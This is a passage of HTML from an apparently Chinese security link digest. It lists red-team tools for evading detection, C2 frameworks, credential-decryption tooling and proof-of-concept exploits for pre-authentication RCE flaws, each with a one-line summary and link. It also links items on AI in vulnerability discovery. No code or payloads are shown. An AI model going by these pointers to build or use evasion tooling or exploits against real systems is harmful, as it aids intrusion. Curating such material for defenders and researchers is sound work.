href="https://mayfly277.github.io/posts/Dracarys-lab/" target="_blank">https://mayfly277.github.io/posts/Dracarys-lab/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">sopa：Golang编写的ADWS客户端工具，用于与AD域名 Web Services交互</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Macmod/sopa" target="_blank">https://github.com/Macmod/sopa</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">PrivHound：基于BloodHound的Windows本地权限提升路径收集工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/dazzyddos/PrivHound" target="_blank">https://github.com/dazzyddos/PrivHound</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">终端对抗</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">实时编辑编译二进制文件的工具，用于红队操作中的工具定制和规避检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://aff-wg.org/2026/03/03/a-scalpel-a-hammer-and-a-foot-gun/" target="_blank">https://aff-wg.org/2026/03/03/a-scalpel-a-hammer-and-a-foot-gun/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍Nemesis 2.2如何自动化DPAPI解密链，从SYSTEM/用户主密钥到CNG密钥再到Chrome最新应用绑定加密的完整攻击流程</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://specterops.io/blog/2026/03/04/offensive-dpapi-with-nemesis/" target="_blank">https://specterops.io/blog/2026/03/04/offensive-dpapi-with-nemesis/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">使用Conquest C2框架的高级可塑性网络配置文件自定义C2流量，以规避检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://jakobfriedl.github.io/blog/conquest-profiles/" target="_blank">https://jakobfriedl.github.io/blog/conquest-profiles/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">EvadeX：规避即服务平台，提供自动化、可定制的低特征载荷生成功能</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://phantomsec.tools/" target="_blank">https://phantomsec.tools/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">DLLHijackHunter：自动化DLL劫持检测工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/ghostvectoracademy/DLLHijackHunter" target="_blank">https://github.com/ghostvectoracademy/DLLHijackHunter</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Maverick：使用Crystal Palace PIC链接器和PICO模块系统的Adaptix C2代理工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/BlackSnufkin/Maverick" target="_blank">https://github.com/BlackSnufkin/Maverick</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">eden：Cobalt Strike PoC UDRL，结合了页面流技术和模块化调用门</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Cobalt-Strike/eden" target="_blank">https://github.com/Cobalt-Strike/eden</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">漏洞相关</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-21902：Juniper Junos Evolved预认证远程代码执行漏洞的分析文章，包含PoC代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/" target="_blank">https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-29000：pac4j-jwt身份验证库存在严重身份验证绕过漏洞，攻击者仅需公钥即可伪造任意用户JWT令牌</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key" target="_blank">https://www.codeant.ai/security-research/pac4j-jwt-authentication-bypass-public-key</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-21643：FortiClient EMS 7.4.4版本存在预认证SQL注入漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4" target="_blank">https://bishopfox.com/blog/cve-2026-21643-pre-authentication-sql-injection-in-forticlient-ems-7-4-4</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-20127：Cisco SD-WAN控制器和管理器预认证远程代码执行漏洞的PoC利用代码</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/zerozenxlabs/CVE-2026-20127---Cisco-SD-WAN-Preauth-RCE" target="_blank">https://github.com/zerozenxlabs/CVE-2026-20127---Cisco-SD-WAN-Preauth-RCE</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;color: rgb(62, 62, 62);padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">RankClaw：SKILLS扫描平台，用于检测AI助手技能中的恶意代码和数据泄露风险</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://rankclaw.com/" target="_blank">https://rankclaw.com/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="color: rgb(62, 62, 62);letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">探讨AI技术部署带来的实际风险，特别是自主生成漏洞利用可能引发的安全问题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://honnibal.dev/blog/clownpocalypse" target="_blank">https://honnibal.dev/blog/clownpocalypse</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Alex Stamos探讨AI如何彻底改变安全实践，并预测未来五年安全团队将变得更小、更专业化，由资深人员领导AI代理</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://drive.google.com/file/d/1hU3Vxm8uyU39lgfjIRfhKoTU6xigKGGy/view" target="_blank">https://drive.google.com/file/d/1hU3Vxm8uyU39lgfjIRfhKoTU6xigKGGy/view</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OpenAI推出Codex Security应用安全代理，通过深度上下文分析识别复杂漏洞并提供修复方案</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openai.com/index/codex-security-now-in-research-preview/" target="_blank">https://openai.com/index/codex-security-now-in-research-preview/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Anthropic与Mozilla合作，Claude Opus 4.6在两周内发现22个Firefox漏洞，其中14个为高危漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.anthropic.com/news/mozilla-firefox-security" target="_blank">https://www.anthropic.com/news/mozilla-firefox-security</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关于Claude模型在漏洞发现和利用编写方面能力评估的文章分析，讨论了AI对网络安全攻防的影响</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.linkedin.com/in/keane-lucas" target="_blank">https://www.linkedin.com/in/keane-lucas</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍如何利用大语言模型改进第一方漏洞发现的演讲材料，包括评估方法、架构设计和开源工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://docs.google.com/presentation/d/1GryXo01btTcXv7yhRCqt6bbsVgRiarjfwzF8xi2b1ns/edit?slide=id.p" target="_blank">https://docs.google.com/presentation/d/1GryXo01btTcXv7yhRCqt6bbsVgRiarjfwzF8xi2b1ns/edit?slide=id.p</a><a class="wx_topic_link" topic-id="mmomcyi8-ptxws6" style="color: #576B95 !important;" data-topic="1">#slide</a>=id.p</span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Trail of Bits公司分享其如何实现AI原生转型，包括AI成熟度矩阵和AI在安全领域的应用</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 